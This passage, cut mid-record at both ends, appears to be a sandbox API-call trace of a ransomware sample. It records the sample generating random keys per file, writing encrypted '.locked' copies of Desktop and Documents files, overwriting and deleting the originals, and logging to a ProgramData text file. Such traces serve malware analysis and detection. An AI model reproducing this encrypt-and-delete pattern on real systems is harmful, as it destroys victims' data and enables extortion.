(hHandle=0x1b8, dwMilliseconds=0x1) returned 0x102 [0273.614] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0273.614] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0x1) returned 0x102 [0273.629] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0273.629] SetEvent (hEvent=0x14c) returned 1 [0273.629] SetEvent (hEvent=0x190) returned 1 [0273.629] SetEvent (hEvent=0x104) returned 1 [0273.629] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0273.637] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x337efb34, ulCount=0x10, ulNumEntriesRemoved=0x337efb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x337efb34, ulNumEntriesRemoved=0x337efb14) returned 0 [0273.637] SetEvent (hEvent=0x150) returned 1 [0273.637] SetEvent (hEvent=0x104) returned 1 [0273.637] SetEvent (hEvent=0x190) returned 1 [0273.659] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0x1) returned 0x102 [0273.670] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0273.670] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x337efb30, ulCount=0x10, ulNumEntriesRemoved=0x337efb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x337efb30, ulNumEntriesRemoved=0x337efb10) returned 0 [0273.670] SetEvent (hEvent=0x190) returned 1 [0273.670] SetEvent (hEvent=0x104) returned 1 [0273.676] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0x1) returned 0x102 [0273.692] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0273.692] SetEvent (hEvent=0x1dc) returned 1 [0273.692] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0273.696] SetEvent (hEvent=0x190) returned 1 [0273.696] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0273.714] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0273.728] SetEvent (hEvent=0x214) returned 1 [0273.728] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0274.175] SetEvent (hEvent=0x1dc) returned 1 [0274.175] SetEvent (hEvent=0x1d0) returned 1 [0274.175] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0274.249] SetEvent (hEvent=0x1dc) returned 1 [0274.249] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0274.314] SetEvent (hEvent=0x1dc) returned 1 [0274.314] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0274.324] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0274.325] GetConsoleMode (in: hConsoleHandle=0x200, lpMode=0x1276fe94 | out: lpMode=0x1276fe94) returned 0 [0274.325] WriteFile (in: hFile=0x200, lpBuffer=0x123481e0*, nNumberOfBytesToWrite=0x2d, lpNumberOfBytesWritten=0x1276fe64, lpOverlapped=0x0 | out: lpBuffer=0x123481e0*, lpNumberOfBytesWritten=0x1276fe64*=0x2d, lpOverlapped=0x0) returned 1 [0274.325] CloseHandle (hObject=0x200) returned 1 [0274.326] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\ivion.png" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\ivion.png")) returned 1 [0274.360] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0276.881] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0x1) returned 0x0 [0276.898] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x337efb30, ulCount=0x10, ulNumEntriesRemoved=0x337efb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x337efb30, ulNumEntriesRemoved=0x337efb10) returned 0 [0276.898] SetEvent (hEvent=0x150) returned 1 [0276.898] SetEvent (hEvent=0x1dc) returned 1 [0276.898] SetEvent (hEvent=0x20c) returned 1 [0277.008] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\ivion.png" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\ivion.png"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0277.066] GetConsoleMode (in: hConsoleHandle=0x1bc, lpMode=0x1276fe88 | out: lpMode=0x1276fe88) returned 0 [0277.066] WriteFile (in: hFile=0x1bc, lpBuffer=0x13e16000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x1276fe78, lpOverlapped=0x0 | out: lpBuffer=0x13e16000*, lpNumberOfBytesWritten=0x1276fe78*=0xfa000, lpOverlapped=0x0) returned 1 [0277.110] CloseHandle (hObject=0x1bc) returned 1 [0277.192] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0278.153] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0278.214] SetEvent (hEvent=0x104) returned 1 [0278.214] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0x1) returned 0x102 [0278.316] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0278.316] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0x1) returned 0x102 [0278.368] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0278.368] SetEvent (hEvent=0x1ac) returned 1 [0278.368] SetEvent (hEvent=0x184) returned 1 [0278.368] SetEvent (hEvent=0x134) returned 1 [0278.368] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0278.376] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x337efb34, ulCount=0x10, ulNumEntriesRemoved=0x337efb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x337efb34, ulNumEntriesRemoved=0x337efb14) returned 0 [0278.376] SetEvent (hEvent=0x184) returned 1 [0278.376] SetEvent (hEvent=0x134) returned 1 [0278.376] SetEvent (hEvent=0x1ac) returned 1 [0278.376] WriteFile (in: hFile=0x1bc, lpBuffer=0x16ca2000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x1276ae78, lpOverlapped=0x0 | out: lpBuffer=0x16ca2000*, lpNumberOfBytesWritten=0x1276ae78*=0xfa000, lpOverlapped=0x0) returned 1 [0278.410] CloseHandle (hObject=0x1bc) returned 1 [0278.466] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\ZA606Y.rtf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\za606y.rtf")) returned 1 [0278.575] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1234c200*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x1239da24, lpReserved=0x0 | out: lpBuffer=0x1234c200*, lpNumberOfCharsWritten=0x1239da24*=0xb) returned 1 [0278.661] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\bHSVytOE\\WqsBnn5V5.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\bhsvytoe\\wqsbnn5v5.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b0 [0278.661] GetConsoleMode (in: hConsoleHandle=0x1b0, lpMode=0x1239dd9c | out: lpMode=0x1239dd9c) returned 0 [0278.661] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\bHSVytOE\\WqsBnn5V5.flv.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\bhsvytoe\\wqsbnn5v5.flv.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0278.780] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0279.045] GetConsoleMode (in: hConsoleHandle=0x1bc, lpMode=0x1239dd9c | out: lpMode=0x1239dd9c) returned 0 [0279.045] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1234c200 | out: pbBuffer=0x1234c200) returned 1 [0279.045] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x1234e070 | out: pbBuffer=0x1234e070) returned 1 [0279.045] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12702201 | out: pbBuffer=0x12702201) returned 1 [0279.046] WriteFile (in: hFile=0x1bc, lpBuffer=0x126ad000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1239dd78, lpOverlapped=0x0 | out: lpBuffer=0x126ad000*, lpNumberOfBytesWritten=0x1239dd78*=0x80, lpOverlapped=0x0) returned 1 [0279.051] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0x1) returned 0x102 [0279.095] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0279.095] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x337efb30, ulCount=0x10, ulNumEntriesRemoved=0x337efb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x337efb30, ulNumEntriesRemoved=0x337efb10) returned 0 [0279.095] SetEvent (hEvent=0x20c) returned 1 [0279.095] SetEvent (hEvent=0x104) returned 1 [0279.095] SetEvent (hEvent=0x184) returned 1 [0279.095] ReadFile (in: hFile=0x1b0, lpBuffer=0x147d8000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1239dd68, lpOverlapped=0x0 | out: lpBuffer=0x147d8000*, lpNumberOfBytesRead=0x1239dd68*=0xc05e, lpOverlapped=0x0) returned 1 [0279.098] WriteFile (in: hFile=0x1bc, lpBuffer=0x147d8000*, nNumberOfBytesToWrite=0xc05e, lpNumberOfBytesWritten=0x1239dd74, lpOverlapped=0x0 | out: lpBuffer=0x147d8000*, lpNumberOfBytesWritten=0x1239dd74*=0xc05e, lpOverlapped=0x0) returned 1 [0279.603] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0280.154] ReadFile (in: hFile=0x1b0, lpBuffer=0x147d8000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1239dd68, lpOverlapped=0x0 | out: lpBuffer=0x147d8000*, lpNumberOfBytesRead=0x1239dd68*=0x0, lpOverlapped=0x0) returned 1 [0280.154] CloseHandle (hObject=0x1bc) returned 1 [0280.197] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0282.393] SetEvent (hEvent=0x150) returned 1 [0282.393] CloseHandle (hObject=0x1b0) returned 1 [0282.393] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0282.693] SetEvent (hEvent=0x20c) returned 1 [0282.693] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0282.704] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0282.847] SetEvent (hEvent=0x104) returned 1 [0282.847] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0282.882] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\bHSVytOE\\RqMHt Jbqykr-i2R.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\bhsvytoe\\rqmht jbqykr-i2r.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x230 [0282.883] GetConsoleMode (in: hConsoleHandle=0x230, lpMode=0x12625d9c | out: lpMode=0x12625d9c) returned 0 [0282.883] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\bHSVytOE\\RqMHt Jbqykr-i2R.jpg.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\bhsvytoe\\rqmht jbqykr-i2r.jpg.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x218 [0283.588] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0283.858] SetEvent (hEvent=0x214) returned 1 [0283.858] GetConsoleMode (in: hConsoleHandle=0x218, lpMode=0x12625d9c | out: lpMode=0x12625d9c) returned 0 [0283.858] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0284.242] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12390000 | out: pbBuffer=0x12390000) returned 1 [0284.242] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x12766040 | out: pbBuffer=0x12766040) returned 1 [0284.242] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12714001 | out: pbBuffer=0x12714001) returned 1 [0284.243] WriteFile (in: hFile=0x218, lpBuffer=0x1238e000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12625d78, lpOverlapped=0x0 | out: lpBuffer=0x1238e000*, lpNumberOfBytesWritten=0x12625d78*=0x80, lpOverlapped=0x0) returned 1 [0284.259] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0x1) returned 0x102 [0284.367] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0284.367] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x337efb30, ulCount=0x10, ulNumEntriesRemoved=0x337efb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x337efb30, ulNumEntriesRemoved=0x337efb10) returned 0 [0284.368] SetEvent (hEvent=0x150) returned 1 [0284.368] SetEvent (hEvent=0x214) returned 1 [0284.368] SetEvent (hEvent=0x12c) returned 1 [0284.368] SetEvent (hEvent=0x190) returned 1 [0284.368] ReadFile (in: hFile=0x230, lpBuffer=0x13e14000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12625d68, lpOverlapped=0x0 | out: lpBuffer=0x13e14000*, lpNumberOfBytesRead=0x12625d68*=0x17204, lpOverlapped=0x0) returned 1 [0284.373] WriteFile (in: hFile=0x218, lpBuffer=0x13e14000*, nNumberOfBytesToWrite=0x17204, lpNumberOfBytesWritten=0x12625d74, lpOverlapped=0x0 | out: lpBuffer=0x13e14000*, lpNumberOfBytesWritten=0x12625d74*=0x17204, lpOverlapped=0x0) returned 1 [0284.491] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0284.971] ReadFile (in: hFile=0x230, lpBuffer=0x13e14000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12625d68, lpOverlapped=0x0 | out: lpBuffer=0x13e14000*, lpNumberOfBytesRead=0x12625d68*=0x0, lpOverlapped=0x0) returned 1 [0284.971] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0285.155] CloseHandle (hObject=0x218) returned 1 [0285.616] CloseHandle (hObject=0x230) returned 1 [0285.616] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x230 [0285.616] GetConsoleMode (in: hConsoleHandle=0x230, lpMode=0x12625e94 | out: lpMode=0x12625e94) returned 0 [0285.616] WriteFile (in: hFile=0x230, lpBuffer=0x12352140*, nNumberOfBytesToWrite=0x4a, lpNumberOfBytesWritten=0x12625e64, lpOverlapped=0x0 | out: lpBuffer=0x12352140*, lpNumberOfBytesWritten=0x12625e64*=0x4a, lpOverlapped=0x0) returned 1 [0285.616] CloseHandle (hObject=0x230) returned 1 [0285.619] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\bHSVytOE\\RqMHt Jbqykr-i2R.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\bhsvytoe\\rqmht jbqykr-i2r.jpg")) returned 1 [0286.594] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0287.874] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0287.932] SetEvent (hEvent=0x12c) returned 1 [0287.932] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0287.982] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\9Q7-bFR.xlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\9q7-bfr.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f4 [0287.982] GetConsoleMode (in: hConsoleHandle=0x1f4, lpMode=0x1265dd9c | out: lpMode=0x1265dd9c) returned 0 [0287.982] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\9Q7-bFR.xlsx.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\9q7-bfr.xlsx.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c8 [0287.983] GetConsoleMode (in: hConsoleHandle=0x1c8, lpMode=0x1265dd9c | out: lpMode=0x1265dd9c) returned 0 [0287.983] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12390020 | out: pbBuffer=0x12390020) returned 1 [0287.983] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x12766030 | out: pbBuffer=0x12766030) returned 1 [0287.983] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12702201 | out: pbBuffer=0x12702201) returned 1 [0287.983] WriteFile (in: hFile=0x1c8, lpBuffer=0x12749000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1265dd78, lpOverlapped=0x0 | out: lpBuffer=0x12749000*, lpNumberOfBytesWritten=0x1265dd78*=0x80, lpOverlapped=0x0) returned 1 [0287.986] ReadFile (in: hFile=0x1f4, lpBuffer=0x1430a000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1265dd68, lpOverlapped=0x0 | out: lpBuffer=0x1430a000*, lpNumberOfBytesRead=0x1265dd68*=0x165ec, lpOverlapped=0x0) returned 1 [0287.992] WriteFile (in: hFile=0x1c8, lpBuffer=0x1430a000*, nNumberOfBytesToWrite=0x165ec, lpNumberOfBytesWritten=0x1265dd74, lpOverlapped=0x0 | out: lpBuffer=0x1430a000*, lpNumberOfBytesWritten=0x1265dd74*=0x165ec, lpOverlapped=0x0) returned 1 [0288.076] ReadFile (in: hFile=0x1f4, lpBuffer=0x1430a000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1265dd68, lpOverlapped=0x0 | out: lpBuffer=0x1430a000*, lpNumberOfBytesRead=0x1265dd68*=0x0, lpOverlapped=0x0) returned 1 [0288.076] CloseHandle (hObject=0x1c8) returned 1 [0288.079] CloseHandle (hObject=0x1f4) returned 1 [0288.080] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f4 [0288.080] GetConsoleMode (in: hConsoleHandle=0x1f4, lpMode=0x1265de94 | out: lpMode=0x1265de94) returned 0 [0288.080] WriteFile (in: hFile=0x1f4, lpBuffer=0x12670180*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x1265de64, lpOverlapped=0x0 | out: lpBuffer=0x12670180*, lpNumberOfBytesWritten=0x1265de64*=0x32, lpOverlapped=0x0) returned 1 [0288.080] CloseHandle (hObject=0x1f4) returned 1 [0288.083] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\9Q7-bFR.xlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\9q7-bfr.xlsx")) returned 1 [0288.270] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0288.513] SetEvent (hEvent=0x20c) returned 1 [0288.513] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0288.558] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\u5XgcDVp\\1s4d3CDN.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\u5xgcdvp\\1s4d3cdn.flv")) returned 1 [0288.621] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0288.947] SetEvent (hEvent=0x12c) returned 1 [0288.947] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0288.977] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0289.017] SetEvent (hEvent=0x134) returned 1 [0289.017] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0289.068] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0x1) returned 0x102 [0289.091] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0289.091] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x337efb30, ulCount=0x10, ulNumEntriesRemoved=0x337efb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x337efb30, ulNumEntriesRemoved=0x337efb10) returned 0 [0289.091] SetEvent (hEvent=0x104) returned 1 [0289.091] SetEvent (hEvent=0x134) returned 1 [0289.091] SetEvent (hEvent=0x22c) returned 1 [0289.093] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0x1) returned 0x102 [0289.544] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0289.544] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0x1) returned 0x102 [0289.660] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0289.660] SetEvent (hEvent=0x22c) returned 1 [0289.661] SetEvent (hEvent=0x134) returned 1 [0289.661] SetEvent (hEvent=0x14c) returned 1 [0289.661] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0289.712] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x337efb34, ulCount=0x10, ulNumEntriesRemoved=0x337efb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x337efb34, ulNumEntriesRemoved=0x337efb14) returned 0 [0289.712] SetEvent (hEvent=0x14c) returned 1 [0289.712] SetEvent (hEvent=0x134) returned 1 [0289.738] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0x1) returned 0x102 [0289.809] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0289.809] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x337efb30, ulCount=0x10, ulNumEntriesRemoved=0x337efb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x337efb30, ulNumEntriesRemoved=0x337efb10) returned 0 [0289.809] SetEvent (hEvent=0x150) returned 1 [0289.810] SetEvent (hEvent=0x134) returned 1 [0289.810] SetEvent (hEvent=0x14c) returned 1 [0289.815] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0x1) returned 0x102 [0289.833] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0289.834] SetEvent (hEvent=0x190) returned 1 [0289.834] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0290.438] SetEvent (hEvent=0x1dc) returned 1 [0290.438] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0290.530] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0290.537] SetEvent (hEvent=0x134) returned 1 [0290.537] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0290.638] SetEvent (hEvent=0x1dc) returned 1 [0290.638] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0290.839] SetEvent (hEvent=0x190) returned 1 [0290.839] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0292.264] WriteFile (in: hFile=0x180, lpBuffer=0x13914000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x1276de78, lpOverlapped=0x0 | out: lpBuffer=0x13914000*, lpNumberOfBytesWritten=0x1276de78*=0xfa000, lpOverlapped=0x0) returned 1 [0292.831] CloseHandle (hObject=0x180) returned 1 [0292.913] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\bHSVytOE\\RqMHt Jbqykr-i2R.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\bhsvytoe\\rqmht jbqykr-i2r.jpg")) returned 1 [0293.064] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0293.545] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0293.655] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0293.675] SetEvent (hEvent=0x12c) returned 1 [0293.675] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0295.251] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\u5XgcDVp\\xxY CYyYbKsjdn.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\u5xgcdvp\\xxy cyyybksjdn.swf")) returned 1 [0295.268] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\Crvhk0MgLr2QKx _m.pdf.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\crvhk0mglr2qkx _m.pdf.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x230 [0295.472] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0295.559] SetEvent (hEvent=0x14c) returned 1 [0295.559] GetConsoleMode (in: hConsoleHandle=0x230, lpMode=0x12623d9c | out: lpMode=0x12623d9c) returned 0 [0295.560] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0295.871] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12390000 | out: pbBuffer=0x12390000) returned 1 [0295.873] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x124a8070 | out: pbBuffer=0x124a8070) returned 1 [0295.873] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12714001 | out: pbBuffer=0x12714001) returned 1 [0295.874] WriteFile (in: hFile=0x230, lpBuffer=0x12681000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12623d78, lpOverlapped=0x0 | out: lpBuffer=0x12681000*, lpNumberOfBytesWritten=0x12623d78*=0x80, lpOverlapped=0x0) returned 1 [0295.930] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0x1) returned 0x0 [0295.940] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x337efb30, ulCount=0x10, ulNumEntriesRemoved=0x337efb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x337efb30, ulNumEntriesRemoved=0x337efb10) returned 0 [0295.940] SetEvent (hEvent=0x150) returned 1 [0295.940] SetEvent (hEvent=0x190) returned 1 [0295.940] SetEvent (hEvent=0x20c) returned 1 [0295.940] SetEvent (hEvent=0x1ac) returned 1 [0295.941] ReadFile (in: hFile=0x228, lpBuffer=0x12a84000, nNumberOfBytesToRead=0x9c4000, 